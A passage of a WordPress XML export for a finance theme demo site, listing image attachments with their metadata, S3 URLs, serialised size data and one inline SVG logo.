		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-7.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-7.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:23:"2020/10/product-7.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:23:"product-7-1-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"product-7-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"product-7-1-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>product-8</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/product-8/</link>
		<pubDate>Mon, 05 Oct 2020 10:15:16 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/product-8.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1280</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 10:15:16]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 10:15:16]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[product-8]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-8.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-8.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:23:"2020/10/product-8.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:23:"product-8-1-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"product-8-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"product-8-1-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>product-9</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/product-9/</link>
		<pubDate>Mon, 05 Oct 2020 10:15:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/product-9.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1281</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 10:15:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 10:15:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[product-9]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-9.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-9.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:23:"2020/10/product-9.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:23:"product-9-1-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"product-9-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"product-9-1-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/bg2-home2/</link>
		<pubDate>Wed, 21 Oct 2020 03:49:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1386</wp:post_id>
		<wp:post_date><![CDATA[2020-10-21 03:49:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-21 03:49:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/bg2-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:567;s:4:"file";s:21:"2020/10/bg2-home2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:20:"bg2-home2-300x89.jpg";s:5:"width";i:300;s:6:"height";i:89;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg2-home2-1024x302.jpg";s:5:"width";i:1024;s:6:"height";i:302;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg2-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg2-home2-768x227.jpg";s:5:"width";i:768;s:6:"height";i:227;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg2-home2-1536x454.jpg";s:5:"width";i:1536;s:6:"height";i:454;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg2-home2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg2-home2-600x567.jpg";s:5:"width";i:600;s:6:"height";i:567;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg2-home2-1200x567.jpg";s:5:"width";i:1200;s:6:"height";i:567;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg2-home2-1200x567.jpg";s:5:"width";i:1200;s:6:"height";i:567;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg3-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/bg3-home2/</link>
		<pubDate>Wed, 21 Oct 2020 08:04:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg3-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1406</wp:post_id>
		<wp:post_date><![CDATA[2020-10-21 08:04:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-21 08:04:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg3-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg3-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/bg3-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:692;s:4:"file";s:21:"2020/10/bg3-home2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:21:"bg3-home2-300x108.jpg";s:5:"width";i:300;s:6:"height";i:108;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg3-home2-1024x369.jpg";s:5:"width";i:1024;s:6:"height";i:369;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg3-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg3-home2-768x277.jpg";s:5:"width";i:768;s:6:"height";i:277;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg3-home2-1536x554.jpg";s:5:"width";i:1536;s:6:"height";i:554;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg3-home2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg3-home2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg3-home2-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg3-home2-1200x692.jpg";s:5:"width";i:1200;s:6:"height";i:692;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>04_Full_White</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/ot_header_builders/header-mobile/04_full_white/</link>
		<pubDate>Mon, 09 Nov 2020 04:47:32 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/04_Full_White.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1776</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:47:32]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:47:32]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[04_full_white]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>77</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/04_Full_White.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/05/04_Full_White.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st0" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st0" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
	<path class="st0" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
	<path class="st0" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st0" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st0" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st0" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image-banner-home4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/image-banner-home4/</link>
		<pubDate>Tue, 10 Nov 2020 10:42:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image-banner-home4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1819</wp:post_id>
		<wp:post_date><![CDATA[2020-11-10 10:42:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-10 10:42:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image-banner-home4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image-banner-home4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/image-banner-home4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:780;s:4:"file";s:30:"2020/11/image-banner-home4.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:30:"image-banner-home4-300x122.jpg";s:5:"width";i:300;s:6:"height";i:122;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"image-banner-home4-1024x416.jpg";s:5:"width";i:1024;s:6:"height";i:416;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"image-banner-home4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:30:"image-banner-home4-768x312.jpg";s:5:"width";i:768;s:6:"height";i:312;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:31:"image-banner-home4-1536x624.jpg";s:5:"width";i:1536;s:6:"height";i:624;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"image-banner-home4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"image-banner-home4-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:31:"image-banner-home4-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:31:"image-banner-home4-1200x780.jpg";s:5:"width";i:1200;s:6:"height";i:780;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_va